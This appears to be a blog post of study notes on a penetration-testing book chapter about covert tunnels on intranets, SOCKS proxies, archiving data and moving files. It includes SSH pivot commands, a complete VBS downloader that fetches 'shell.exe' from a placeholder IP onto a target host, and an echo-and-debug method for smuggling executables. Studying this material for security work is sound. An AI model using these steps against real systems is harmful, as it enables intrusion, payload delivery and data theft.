content
foreword
This article continues to read and learn "Intranet Security Attack and Defense: Penetration Testing Practical Guide", which is the third chapter of hidden communication tunnel technology, which introduces in detail the use of IPv6 tunnels, ICMP tunnels, HTTPS tunnels, SSH tunnels, DNS tunnels and other encrypted tunnels. And explain the common SOCKS proxy tools and intranet upload/download methods
Relevant knowledge has also been studied and sorted out before, see: Intranet Penetration Series: Intranet Penetration (Tunnel) Learning
1. Basic knowledge
1 Overview
The network hidden communication tunnel is the main tool for information transfer with the target host
When a large number of TCP and UDP communications are intercepted by defense systems, protocols that are difficult to disable such as DNS and ICMP have been exploited by attackers and become the main channel for attackers to control tunnels
Commonly used tunnels:
- Network layer: IPv6 tunnel, ICMP tunnel, GRE tunnel
- Transport layer: TCP tunnel, UDP tunnel, regular port forwarding
- Application layer: SSH tunnel, HTTP tunnel, HTTPS tunnel, DNS tunnel
2. Determine the connectivity of the intranet
The judgment method is as follows:
//ICMP协议
ping www.baidu.com
//TCP协议
nc -zv 192.168.1.10 80
//HTTP协议
curl www.baidu.com:80
//curl的代理模式
curl -x proxy-ip:port www.baidu.com
//DNS协议
//windows下的nslookup
mslookup www.baidu.com vps-ip
//linux下的dig
dig @vps-ip www.baidu.com
2. Network Layer Tunneling Technology
1. IPv6 tunnel
An IPv6 tunnel can use IPv4 as a tunnel carrier and encapsulate the entire IPv6 packet in an IPv4 data packet.
Several tools:
2. ICMP tunnel
In a general communication protocol, if two devices want to communicate, an open port is definitely required, but it is not required under the ICMP protocol.
See also: Intranet penetration series: ICMP tunnel of intranet tunnel
3. Transport Layer Tunneling Technology
Mainly TCP tunnels, UDP tunnels and regular port forwarding, most of which will be blocked
Tools can be found in: Intranet Penetration Series: Intranet Penetration (Tunnel) Learning
4. Application Layer Tunneling Technology
1. SSH tunnel
Almost all Linux/UNIX servers and network devices support the SSH protocol. The SSH protocol is allowed to pass through firewalls and border devices, so it is often exploited by attackers
//本地转发
ssh -CfNg -L 1153(VPS端口):1.1.1.10(目标IP):3389(目标端口)
[email protected](跳板机)
//远程转发
ssh -CfNg -R 3307(VPS端口):1.1.1.10(目标IP):3389(目标端口)
[email protected]
-L local port forwarding, -R remote port forwarding, -D dynamic forwarding (SOCKS proxy)**
defense:
- IP whitelist
- ACL restrict request IP
- Set up the system to use out-of-band management entirely
2. HTTP/HTTPS tunnel
reGeorg, meterpreter, tunna, etc. are all famous
3. DNS tunnel
DNS is an essential service, and DNS packets have the ability to penetrate firewalls.
From the point of view of the DNS protocol, it is only to query a specific domain name again and again and get the resolution result, but the essential problem is that the expected return result should be an IP address, but the actual return is an arbitrary string, including encrypted C2 instruction.
The essence of DNS tunneling is to encapsulate other protocols in the DNS protocol for transmission.
See: Intranet Penetration Series: DNS Tunnel of Intranet Tunnel
5. SOCKS proxy
SOCKS is short for "SOCKetS"
- SOCKS4 only supports TCP protocol
- SOCKS5 not only supports TCP/UDP protocol, but also supports various authentication mechanisms
The SOCKS proxy is at the lower level and is at the session layer; while the HTTP proxy is at the application layer. Therefore, a SOCKS proxy can proxy all client connections, while an HTTP proxy can only proxy clients that use the HTTP protocol. SOCKS proxies are faster because they are lower-level and don't need to deal with the details of higher-level protocols.
SOCKET is called "socket", which is used to describe IP address and port. It is a handle of a communication chain and can be used to realize communication between different computers. Its essence is a programming interface (API), which is a IP encapsulation. SOCKS is a proxy protocol. The latest version is SOCKS5. The so-called proxy means that you can access the network indirectly through it, which is equivalent to a transit station. Difference: SOCKET is an API, a tool that allows you to establish network connections. SOCKS is a protocol, a set of data structures.
At present, there are four main VPN tunneling protocols: the point-to-point tunneling protocol PPTP, the second layer tunneling protocol L2TP, the network layer tunneling protocol IPSec and the SOCKS v5 protocol. Among them, PPTP and L2TP work at the data link layer, IPSec works at the network layer, and SOCKS v5 works at the session layer.
eg EarthWorm (ew, new version Termite), reGeorg, sSocks, SocksCap64 (SSTap), Proxifier, ProxyChains
6. Compressed data
1、rar.exe
Package all the contents in the E:\webs\ directory into 1.rar and put it in the E:\webs\ directory
rar.exe a -k -r -s -m3 E:\webs\1.rar E:\webs\
Extract E:\webs\1.rar to the current root directory
rar.exe e E:\webs\1.rar
Compress all files and folders in the API directory of the E disk by volume, and set each volume to 20M
rar.exe a -m0 -r -v20m E:\test.rar E:\API
Unzip E:\test.part01.rar to the x1 directory of the E drive
rar.exe x E:\test.part01.rar E:\x1
2、7-zip
Package all the content in the E:\webs\ directory into 1.7z and put it in the E:\webs\ directory
7z.exe a -k -r -p12345 E:\webs\1.7z E:\webs\
Unzip E:\webs\1.7z to the current root directory
7z.exe e -p12345 E:\webs\1.7z
Compress all files and folders in the API directory of the E disk by volume, and set each volume to 20M
7z.exe -r -vlm -padmin a E:\test.7z E:\API
Unzip E:\test.part01.7z to the x1 directory of the E drive
7z.exe x -padmin E:\test.7z.001 -oE:\x1
Seven, upload and download
1、VBS
Execute the following command to download the shell.exe file on the target host
Cscript download.vbs
download.vbs code:
Set Post=CreateObject("Msxml2.XMLHTTP")
Set shell = CreateObject("Wscript.Shell")
post.Open "GET","http://IP/shell.exe",0
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(post.responseBody)
aGet.SaveToFile "C:\test\shell.exe",2
2. Debug upload
First convert the EXE file to be uploaded into the form of hexadecimal HEX, then write the HEX code to the file through the echo command, and finally use the Debug function to compile and restore the HEX code to an EXE file
In KaliLlnux, the exe2bat.exe tool is located in the /usr/share/windows-binaries directory, execute
wine exe2bat.exe ew.exe ew.txt
Convert ew.exe to ew.txt
Then, use the Debug function of the target server to restore the HEX code to an EXE file,
and then use the echo command to copy the code in ew.txt to the command line environment of the target system
3. Other
You can also upload files with these:
- Nishang: Use Nishang to convert the uploaded EXE file to hexadecimal form, then use the echo command to access the target server, and finally use the Download_Execute script to download the text file and convert it to an EXE file
- bitsadmm: Recommended for use on Windows7 and Windows8 hosts, note that it does not support HTTPS and FTP protocols, nor does it support WindowsXP/Sever2003 and earlier versions
- PowerShellDownload
Epilogue
This chapter is mainly about hidden communication tunnels. Since this part of knowledge has been learned before, it will not be recorded in detail here. For details, see other related articles on the blog.